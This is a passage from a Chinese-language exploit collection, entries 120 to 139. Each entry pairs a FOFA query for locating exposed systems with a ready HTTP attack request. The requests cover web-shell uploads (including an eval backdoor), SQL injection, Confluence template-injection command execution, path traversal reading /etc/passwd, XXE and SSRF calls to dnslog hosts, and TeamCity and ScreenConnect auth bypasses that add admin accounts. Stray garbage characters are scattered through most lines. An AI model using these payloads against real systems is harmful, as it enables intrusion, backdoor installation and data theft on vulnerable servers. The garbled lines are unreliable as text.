$ ~- e5 F" s9 a M& yX-Remote-Ip: 1.1.1.1$ m9 d w, [! w% V2 \% w
X-Remote-Addr: 1.1.1.1$ G% V/ c* L8 M+ k9 U8 D K
Te: trailers
0 _0 P X" M) d4 E; Q9 O( W! mConnection: close
8 W& R' l, s( J/ C( p+ D9 ~% ?
; m- D! @7 r' o3 s+ Hsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
$ o7 E9 [- G0 b4 q
' ^8 Y: z M6 x7 z, c# D" i& V. s' b
120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 L/ j9 i# t9 V2 s8 tCVE-2024-1253
! I3 ~& a* |% n6 P7 ]& [) IFOFA:title="Smart管理平台"
+ Y+ H; W% e& }POST /useratte/web.php? HTTP/1.1
3 l" _3 L4 _, C; l: cHost: ip:port b- ]. r$ N1 T! x/ u
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
6 t/ G6 P) p% \3 v- {6 R2 [* LUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
, t$ k2 p: d5 W) C6 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ z8 i" v# B/ r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, | V& O2 U: i! E
Accept-Encoding: gzip, deflate* f; N0 U* K5 P
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
3 C1 V6 O; g4 I6 s2 i' C( yContent-Length: 597
l" c6 d- e" ]) @Origin: https://ip:port( k% Q8 Z0 c, v3 V9 H& \- ?* `
Referer: https://ip:port/sysmanage/licence.php: p' W+ g2 @0 J$ p7 b( `3 }
Upgrade-Insecure-Requests: 1
" ^) s# E5 }: q- i, b0 ySec-Fetch-Dest: document
3 R& a3 e0 T/ z0 @: ~3 [Sec-Fetch-Mode: navigate
: }- W3 a( A+ q/ V, rSec-Fetch-Site: same-origin
! X# e7 o, v4 m r) O; Y, vSec-Fetch-User: ?12 G4 I3 B$ ?: S: ?3 X$ d. [
Te: trailers; C2 ~% p" ^* m1 H& t( V2 u# x
Connection: close
5 A3 v: F7 L( V: f( |- D- c9 q' f) d g
-----------------------------42328904123665875270630079328, i/ F( O" E6 x8 w; y& G: `
Content-Disposition: form-data; name="file_upload"; filename="2.php"/ o% N' M5 F8 D
Content-Type: application/octet-stream0 l1 m7 P2 b+ F: K, H( ~
" ]1 q/ I1 T* V# E<?php phpinfo()?>
0 F/ X5 g/ a0 o/ f-----------------------------42328904123665875270630079328: m$ G; {. N8 }: E% J8 O; V3 _
Content-Disposition: form-data; name="id_type"# u1 R% E0 A+ c6 m2 m5 `
5 j4 q7 {2 C& Z5 |- O
1
9 G1 L3 ~, c/ ~' @; ~; s9 Z-----------------------------42328904123665875270630079328
" i# T# w( G! M/ tContent-Disposition: form-data; name="1_ck"
% T2 z) a: t0 O8 j( v
4 _! ]9 l* n+ x/ Y1_radhttp
2 r9 [4 F( e7 n6 R/ y7 f& } F9 N2 H-----------------------------42328904123665875270630079328& w/ R- @4 T' \3 Z/ a- {( T
Content-Disposition: form-data; name="mode"
$ Q* V. x9 F: v6 X4 s } D$ V M1 d) r+ U, H
import
" L2 B; ?# Z. K8 p9 A7 `. P" l5 r; c-----------------------------423289041236658752706300793283 V2 M9 t! T# T# z. E9 V
& c7 k* N$ g# K4 p5 U
/ f \2 K! R9 c H Z' N6 A6 l* h文件路径/upload/2.php. L3 P) M A" O) ~- E7 b
+ c- P E! `' \8 Q9 e6 W, M
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
- n) p' F" v4 t1 ^+ B" _CVE-2024-1918
6 m3 m% ?. x6 }3 FFOFA:title="Smart管理平台"
& E/ ^( }' }7 `9 [; L9 Y/ PPOST /useratte/userattestation.php HTTP/1.10 M( X2 z9 w/ a2 E( C) A
Host: 192.168.40.130:8443
3 M- U7 T, W1 R& X8 _4 g, A# sCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
6 B" P! P; d9 t. H' `7 T" _. dUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ f4 K' {: l4 i! r2 V( b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: J0 t8 _. m* f, F7 g/ Y, o- DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: q$ Q0 }+ |" o& j
Accept-Encoding: gzip, deflate
5 @1 d0 s' E6 {7 x0 D+ I, X! e8 ?$ GContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328" C7 G: K) N% N5 `4 @1 A
Content-Length: 592
- S/ F, W1 F# EOrigin: https://192.168.40.130:8443
1 c; z* c( Q( i6 D0 m" W% \Upgrade-Insecure-Requests: 1
S$ O& f# u/ i0 R2 I! }3 B, VSec-Fetch-Dest: document
% i* L* ^ i* E4 I, oSec-Fetch-Mode: navigate
& a% M% V6 t' P/ x; m0 @# t- ]* RSec-Fetch-Site: same-origin; u n) I" W4 |. U/ K
Sec-Fetch-User: ?1+ u& \+ S( Y$ f
Te: trailers- x% j$ D I+ A
Connection: close# j! [, v4 g2 l: ~0 @. X) v
0 F5 j1 D# N( \* m r-----------------------------42328904123665875270630079328: J# v" g! ]$ @1 S( P# d1 @$ c
Content-Disposition: form-data; name="web_img"; filename="1.php"
! }5 A* Z2 \ e$ g9 P! z! E1 cContent-Type: application/octet-stream* I. Z9 p G% u7 p! Y3 K7 f8 I
; W. X( _2 C; c* X+ K# \4 Z8 l<?php phpinfo();?>* n4 L( ~/ t" E" a
-----------------------------423289041236658752706300793285 M1 X- @2 X; J! }" \
Content-Disposition: form-data; name="id_type"
) R% u& j5 u. C0 U, J
$ Q: Y/ @) \3 Z1 t4 R6 S) }! W5 U/ O8 t1% d( K9 h+ X) p/ c- M2 ?& V
-----------------------------42328904123665875270630079328
! y4 v" V/ P8 @) P; EContent-Disposition: form-data; name="1_ck"5 S, e9 l+ U* e' E3 q- i
: W, c- O1 O, s
1_radhttp# S8 ]* `( e' ^; |! d- s u* D- s
-----------------------------42328904123665875270630079328
3 F8 L5 @3 a& BContent-Disposition: form-data; name="hidwel"% M0 v+ Z: M3 _3 u7 \+ F
2 e* e* i9 w( E: Z
set
+ {) S, r% z. n4 a6 Z-----------------------------42328904123665875270630079328( J( X7 A/ O. i9 t% w( K( @
[1 O$ N0 N0 D5 A
8 d9 L" s# T# i" C8 J J# Rboot/web/upload/weblogo/1.php/ d) [7 N) Q, o$ Q Y' G2 @
; i1 Q* J/ w, |( Q, U+ q* d( n
122. 北京百绰智能s200管理平台/importexport.php sql注入3 b7 b, n+ V5 S1 n
CVE-2024-27718FOFA:title="Smart管理平台"( b# W3 ]6 x, l+ w
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
4 h% W4 _) j& q, t, WGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.10 X* g/ g: x; J
Host: x.x.x.x! M9 L, e+ L. z
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
4 Z% D! h( a! OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. \) F8 T. x5 G5 N4 d' {2 o9 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& ?" u: Q6 L1 i" P8 h! k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: U% N8 B' ~, b2 F1 w+ sAccept-Encoding: gzip, deflate, br/ k* I! q+ [9 O; P5 Q
Upgrade-Insecure-Requests: 1
" ]: x* p: n+ q. a4 eSec-Fetch-Dest: document6 s4 R! H9 Y# C$ J( S- k
Sec-Fetch-Mode: navigate) o0 X1 L) b6 Y) n- F, r
Sec-Fetch-Site: none
3 n9 b$ s1 M; d6 |. W4 e$ oSec-Fetch-User: ?10 l6 |! u' Z4 {1 F' ^0 [
Te: trailers
9 K( ^0 F7 E. q+ DConnection: close! ?* C3 v" p# W" n
: i" d/ w( `9 }9 u% T
! A1 t# E. J# o" I* f123. Atlassian Confluence 模板注入代码执行. k, q3 _9 m0 }8 ^4 o
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
! k; q4 ?: Z! d" ~( k! Y1 nPOST /template/aui/text-inline.vm HTTP/1.1
4 F* x# K, ?0 o3 }* wHost: localhost:80902 |+ j7 ]+ n7 b ?6 `
Accept-Encoding: gzip, deflate, br& d' y- C/ q. w: V; x& H, F
Accept: */*5 a+ b2 Z- l$ h7 y, g6 t7 [
Accept-Language: en-US;q=0.9,en;q=0.8
- U2 d& `# s4 G; _5 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.364 ?* ?+ s. @4 `( U
Connection: close" a' ^5 O1 ^- Y/ B: m
Content-Type: application/x-www-form-urlencoded3 h& L! S& t0 s8 ^: C+ B- w6 g2 B/ f
: W8 O% n5 g0 z( V, {* y4 q1 alabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))9 W2 b& z" W! v$ }. r* T
' {7 N5 G$ M& M a2 [" z/ h* b n* c: X
124. 湖南建研工程质量检测系统任意文件上传
8 n3 Y& d% G7 q+ V8 \. t) pFOFA:body="/Content/Theme/Standard/webSite/login.css"
! z4 W5 Q4 s2 F: ?POST /Scripts/admintool?type=updatefile HTTP/1.1
, v1 l! j, W) p$ J6 JHost: 192.168.40.130:8282! K0 N/ r ~3 a6 C- g6 ^$ c3 z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 v0 J" C" c! |& n$ F2 T9 x
Content-Length: 72
/ K Z5 d; f9 @, Q: x) CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" n; W1 D/ l+ Y* A2 X
Accept-Encoding: gzip, deflate, br$ Z- c. z5 `% g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ~" ~8 D0 @& m
Connection: close' {4 C* X0 y, q( E/ c! U" X( X! f; W
Content-Type: application/x-www-form-urlencoded' Y T3 D; r. t1 f8 b9 n. @/ ~
2 B4 x4 Q1 O- G. r4 h6 L3 S
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>! A/ J- I. v8 @; c0 I" P
1 O' _) j0 {/ e9 O7 e- S9 @/ Y
6 m$ F& _ _. n1 w: G, {2 _$ c# d- |
http://192.168.40.130:8282/Scripts/abcgcg.aspx9 }5 T0 N y' g2 `7 _1 B
, y! k' M: l4 M125. ConnectWise ScreenConnect身份验证绕过
& U, g$ V* v0 ~+ q, d% \CVE-2024-1709( I6 V6 X! r4 m c
FOFA:icon_hash="-82958153"
+ b. f4 I. a' `$ G2 f1 _4 v- T9 D9 Xhttps://github.com/watchtowrlabs ... bypass-add-user-poc
5 @1 A. ?6 x8 ]2 b; D; C
- i( ?* ?( g8 M$ e7 R
N1 A$ C7 r8 ?7 ]. V) H, [使用方法/ b. ^3 h3 [' r5 F5 Y, R
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
" u- x, `2 |' C' o$ {
' v6 l# |6 ]- n( l
# j: v! b7 X5 d8 Z创建好用户后直接登录后台,可以执行系统命令。) w9 r0 P- Z' H3 v @. U) U1 g T
3 V% o1 r" M: x3 a
126. Aiohttp 路径遍历
2 y. C- C% e# R7 \+ s4 UFOFA:title=="ComfyUI"
( B) J+ h( S' O4 l* i, B) d2 AGET /static/../../../../../etc/passwd HTTP/1.1, o+ d7 i! D! U9 a4 t
Host: x.x.x.x" K: M6 o9 S) a$ V9 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) K- Y9 C# c9 U' l8 V, }Connection: close2 {: t' g3 p7 V) w0 @2 a
Accept: */*
g- ?7 K# w$ vAccept-Language: en5 E C2 I0 a- e3 L) B
Accept-Encoding: gzip
9 P$ I6 Y& v- I1 R
2 P- c6 {7 e4 q7 X# M# q1 K8 k0 U p$ M; t7 W4 i
127. 广联达Linkworks DataExchange.ashx XXE
# t" c% T5 J: ]FOFA:body="Services/Identification/login.ashx"
5 O0 H% v# @3 I6 XPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
' c V/ A5 T0 ?. J5 B% KHost: 192.168.40.130:8888+ r5 B7 a: n* W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
2 r- u7 W& i& J" e8 h0 VContent-Length: 415
+ ~+ C D+ w; c* ~& ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( T; ^9 w0 U8 a% _% t& u4 t1 K
Accept-Encoding: gzip, deflate/ _/ w' l( f( T0 B# B
Accept-Language: zh-CN,zh;q=0.9
3 @0 _( u" O0 }* TConnection: close2 n |" V2 n, i3 P3 X
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0/ q" A$ o$ @& c7 C, Y$ M n
Purpose: prefetch9 G* f8 Q2 H$ h( T
Sec-Purpose: prefetch;prerender
' C+ E' } }( x1 y* F; P) b0 p# {* K# B. d( i8 T
------WebKitFormBoundaryJGgV5l5ta05yAIe0# `8 G3 z- \; t6 D6 s ^
Content-Disposition: form-data;name="SystemName"
+ n* g$ {" l4 q D; z! ]8 {
( |/ O e& d) _: n" `+ W* |0 hBIM- r, o7 I. q3 K
------WebKitFormBoundaryJGgV5l5ta05yAIe0
. A' G7 d% K3 q A# e ?4 }, ~; OContent-Disposition: form-data;name="Params" V! m& \8 E; P+ I: k! b5 S
Content-Type: text/plain
" W% e1 l$ ^8 s9 s0 \1 j7 t
0 R4 c4 Z/ o6 _+ B<?xml version="1.0" encoding="UTF-8"?>
) S* v0 y* h X2 t<!DOCTYPE test [
' k1 W i2 _( m5 N<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">3 e/ }& I! Y/ u' [( q+ W' N
]' a- c0 {0 l( E! Y- u
>; M" |/ O2 J& {6 ~& N
<test>&t;</test># n7 y$ e( B8 v* L1 a$ D0 ~
------WebKitFormBoundaryJGgV5l5ta05yAIe0--/ K3 D) s: j' ~
/ Z) ^& O5 ]( ^- X8 C2 Z1 r; ?
( _3 i/ C; N: D2 W5 ]# s- n1 z3 M; w7 F6 R8 F, d" F3 z' ^
128. Adobe ColdFusion 反序列化
" J; |; q7 O( \& o% r* gCVE-2023-382032 T: V- | g/ g. g- k4 r7 Q: g6 D
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
# U9 A4 G T/ ?% B& MFOFA:app="Adobe-ColdFusion"+ @+ E& m S0 y2 \4 h) D: Z4 U1 y
PAYLOAD# N0 p1 s" v& T4 D
3 I0 h: T: s3 l+ B129. Adobe ColdFusion 任意文件读取1 c# H" a% E1 z9 l
CVE-2024-207673 k, c# {8 R; X
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"' ?+ O1 H( ?* V
第一步,获取uuid
3 P" I% v6 t2 R2 rGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1* M. X9 m' u4 k8 T' B
Host: x.x.x.x$ G; h1 V& m8 w: l3 |( X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' \$ t0 Q" ~+ i3 o0 q% |
Accept: */*/ a7 Y3 ^% G: Y. e! S4 B
Accept-Encoding: gzip, deflate% a$ b3 q, n/ }& o+ a( W1 A
Connection: close' F4 Y6 r) `2 T* @" a: W3 J
+ p j ~# H; ?; X) J
; t, |) X, q2 y* t) n$ P第二步,读取/etc/passwd文件
$ `! ?! |! G" [* H$ }6 ~' fGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
/ i5 P' U+ G2 B3 z2 e2 l* V. u8 e& }Host: x.x.x.x
& p8 o0 |4 q1 M- _8 e4 r! eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, J; n# ~4 j5 ]6 K5 x0 x' P4 v
Accept: */*
- u6 P' x, S$ W g) K* LAccept-Encoding: gzip, deflate
* z0 G$ f- r. o+ o4 e3 g9 V* pConnection: close
% I$ [! L$ k( f, V: l" q, guuid: 85f60018-a654-4410-a783-f81cbd5000b9+ g4 N# v' G4 ~) a
Y4 n4 _. H1 M6 Y" g( u) k
3 M. [7 q- W/ K/ T( G0 L
130. Laykefu客服系统任意文件上传- n1 K: F- q2 j7 [' l
FOFA:icon_hash="-334624619"
3 D5 N/ q$ N5 T, BPOST /admin/users/upavatar.html HTTP/1.11 c0 {+ \ F8 r) `. u9 V
Host: 127.0.0.1$ ~ ` B: ?; J0 d% v
Accept: application/json, text/javascript, */*; q=0.01
^. M$ i8 C. d, k$ [" ^" pX-Requested-With: XMLHttpRequest
5 ]$ P2 |, W) P" P8 ?% {1 kUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
! N# }$ X) A' C% k3 d( `; ?4 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
- E; W- X5 @$ a$ ZAccept-Encoding: gzip, deflate0 p c9 _! M {( q' Z
Accept-Language: zh-CN,zh;q=0.9
6 U; y0 W' I/ h, J# r2 k9 M/ yCookie: user_name=1; user_id=37 D3 k" d' c& P/ a6 h
Connection: close7 O8 {1 x& U3 W
0 W$ {$ H+ V' O6 O; {2 J
------WebKitFormBoundary3OCVBiwBVsNuB2kR# Z: F% I& d0 e1 u7 |9 [' T
Content-Disposition: form-data; name="file"; filename="1.php"0 J. {1 a* K/ J9 K; C
Content-Type: image/png
Q% S& }6 R) K . I" n! g E' |4 M0 E5 Q/ H' z
<?php phpinfo();@eval($_POST['sec']);?>! ^# [/ x9 q% k$ S3 ]$ e5 o; ^
------WebKitFormBoundary3OCVBiwBVsNuB2kR--/ Y: a$ P" m. w7 L: S
9 X6 b, l2 k( w6 P
# k& P) Z1 v4 P4 z/ A! y% l
131. Mini-Tmall <=20231017 SQL注入0 N3 d/ P* x, ~! z
FOFA:icon_hash="-2087517259"- o. k h" a, _1 \& `& x- J( J- Q8 y
后台地址:http://localhost:8080/tmall/admin6 g' u* q V* A. P/ x) u2 X
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
1 \9 k+ s$ a; F; G8 @6 P. c' G/ L6 c
* x) e" @8 Q) `& n" z. |- ^132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过* I5 L7 y- Z# C, i
CVE-2024-27198# r# r5 B9 \& c7 L% c$ j! }2 p3 P- l
FOFA:body="Log in to TeamCity"8 Q: q! `) ]7 x+ V5 Z+ C2 I
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1- u( v! S1 `/ h
Host: 192.168.40.130:8111
9 @" g6 \5 C; ^/ g4 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ e1 p7 [3 C$ _Accept: */*7 q( g1 N+ |' h' b0 C
Content-Type: application/json
6 I( B8 \5 X) f& {1 }: KAccept-Encoding: gzip, deflate
4 n0 z6 R% o1 D4 |' z2 `! g% O- H4 X( c9 y0 y
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
% i1 t1 f" z1 Y/ b8 J
, M& ~/ d6 Y3 B8 n' X3 h5 }6 z
& v/ A8 P% M& u- @# ZCVE-2024-27199
9 a7 u* I% z4 T) V- R5 o$ Q' [/ R/res/../admin/diagnostic.jsp1 [5 N1 u$ c" f% M" a3 W
/.well-known/acme-challenge/../../admin/diagnostic.jsp* J! P* w& Y# L$ j5 V( w$ Z1 T' K
/update/../admin/diagnostic.jsp7 N8 L. K7 S) f( `/ V
5 P; \5 y" k; j
* n2 v8 j# N6 a3 aCVE-2024-27198-RCE.py
/ L* a" N9 |+ Q: r# W, G5 g; f4 C" j, T& P' H0 Q
133. H5 云商城 file.php 文件上传) f6 Q9 j; z2 L0 k* o0 p
FOFA:body="/public/qbsp.php"
2 K3 D2 H" i* C$ L) tPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
; t. c2 P; Q/ W% n" X! ]6 L' fHost: your-ip- `$ N8 V+ Y7 H5 b) M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( U& L E5 P0 _$ ~: ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx' \' G# G, ]9 l/ Z9 y2 r: b
+ S7 j/ v" O4 V1 W6 R
------WebKitFormBoundaryFQqYtrIWb8iBxUCx: f2 G( X7 o( c
Content-Disposition: form-data; name="file"; filename="rce.php"
# b, ~6 r8 a0 G$ U& D5 u& GContent-Type: application/octet-stream3 W1 C# [2 T* y7 l* e9 D d4 b, p
% i- R9 a# q$ t) k3 l% W% p<?php system("cat /etc/passwd");unlink(__FILE__);?>
" \+ m; ]7 H+ R8 ], x* ]4 D------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
$ R7 C, I4 f& [1 M4 X2 z8 A Q C' i, R4 }! n7 b0 E
6 m4 w) x& g+ P$ l6 Q
+ `4 [ e* h2 D; W! T6 h" r134. 网康NS-ASG应用安全网关index.php sql注入
9 ^- R0 ~: h" a$ QCVE-2024-2330' @. b, T7 f. c- L( E& d
Netentsec NS-ASG Application Security Gateway 6.3版本
7 R) z7 Y4 {/ w' G6 HFOFA:app="网康科技-NS-ASG安全网关"
' a6 b& u+ ^7 }0 [: h1 i' W6 J, wPOST /protocol/index.php HTTP/1.18 @9 v" I" y; M1 v( t4 T% C
Host: x.x.x.x
V# s8 G: m" U" {1 jCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de! c1 @# ^/ D* i/ L7 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0' p: c/ i+ H( |# R* D
Accept: */*
?! Z: D- z0 {; J- {) a1 C: u9 IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; x1 y) \$ h" ], U
Accept-Encoding: gzip, deflate, u' j/ {3 K! o. Y9 }
Sec-Fetch-Dest: empty: C" n0 D, D! n6 H! u4 k
Sec-Fetch-Mode: cors' ~0 K0 ^7 W) u
Sec-Fetch-Site: same-origin
' G; a& g/ H% y1 e7 QTe: trailers
( ^. ~+ J6 \' ]9 Y" _" eConnection: close: w1 l+ h" W0 m6 y/ l; G
Content-Type: application/x-www-form-urlencoded+ @7 V, t1 w, q% e
Content-Length: 263
0 U1 W3 S- M* m% B# T/ `* D
% q) k; A/ t5 F' `2 xjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}. j7 e: @5 C7 w! z' [$ n
1 O+ g$ }- R1 C# l7 x
. B* m1 [! Y1 w! H. z135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
) ? ?5 [* ]/ rCVE-2024-2022* ]0 u$ [. |8 }/ b$ {
Netentsec NS-ASG Application Security Gateway 6.3版本
. }8 @ I8 B6 P$ U5 M2 dFOFA:app="网康科技-NS-ASG安全网关"6 b2 Z' G- \- _$ }( i8 T/ b
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.10 Y1 l! f9 g' k2 q
Host: x.x.x.x, l! ^2 e8 y j/ v" g; Q5 k- @8 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* O9 A, F, Z* yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 `( w3 \$ ? I {4 f A
Accept-Encoding: gzip, deflate
, {" @9 z4 [# L! l, SAccept-Language: zh-CN,zh;q=0.9
# [) {# J i; ZConnection: close
7 g4 l+ h6 K4 |% `( l* X0 Z4 j
f! G( @! J' i
& U0 a. d6 L" t# C- v136. NextChat cors SSRF8 N/ j" I# `6 t- E Q
CVE-2023-49785- f5 j/ I3 n9 l* K1 m6 E! D
FOFA:title="NextChat"" x, R8 \9 [7 J7 j4 V }* H1 s" D! K; q
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
# S2 G, w# L/ A. D: w# ZHost: x.x.x.x:10000- E0 ~. g5 n" i0 N) u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 B7 ]0 G# E1 I+ p4 SConnection: close' A7 f- S0 ^. w; [
Accept: */*8 [4 u# P# B4 O6 J
Accept-Language: en
$ H0 m; Z, W9 ~$ E* H: DAccept-Encoding: gzip7 J4 h) ^ f" Q( Y
) ]/ x% |- L" ]' \3 S% V( [1 I1 [+ p. ^( a$ s* T, G
137. 福建科立迅通信指挥调度平台down_file.php sql注入
$ l' |) U1 _) N) L6 v. nCVE-2024-2620# z0 E/ t) F) b8 m4 G$ V
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& z/ A2 l# I7 }7 M! q D: x
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
2 j" V" y# b* t" v1 D6 [& g& pHost: x.x.x.x
% S0 Z1 E/ {( e6 I5 ]* W; CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( B0 {9 E+ j. B5 I# M, `. Q3 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: K" {# u4 ?# i1 }7 w/ W0 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& C" `, o9 h! q* KAccept-Encoding: gzip, deflate, br2 k2 \: h, i: M9 ~7 [
Connection: close4 ~# p5 ]" Z+ `0 V% {5 M2 Y* d
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
$ M# f6 ?* W: Q6 y% }Upgrade-Insecure-Requests: 1* R2 ^2 j: y4 |) a+ c- O
2 N o# P' @# D% s( R& M
0 b4 v1 `8 a# }/ S3 r
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
+ K! S: K1 c1 h4 Q9 _CVE-2024-2621
" | c# m% [& T- ` v' l+ }7 yFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 a* U& k# X1 `+ R& B
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1, c* U3 j* M9 {% U1 j! L# N0 K8 ]
Host: x.x.x.x
4 D/ A7 M3 u7 `3 U- Y, r& A$ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# Z5 {" v3 L7 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; z1 i! X( R) |# i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! d* j# i( G7 X: z4 s
Accept-Encoding: gzip, deflate, br$ [& u) d3 |1 f. s
Connection: close
4 \, m# O$ T! f# n8 N) \; CUpgrade-Insecure-Requests: 1; R9 Z2 H% n9 L1 u
& I# Y$ h2 I+ y9 S: R5 u. k! Z
3 @) F Z- h& g: {5 r e3 q4 q
139. 福建科立讯通信指挥调度平台editemedia.php sql注入4 H+ I# ]& h, g" w; y3 ^; e
CVE-2024-2622
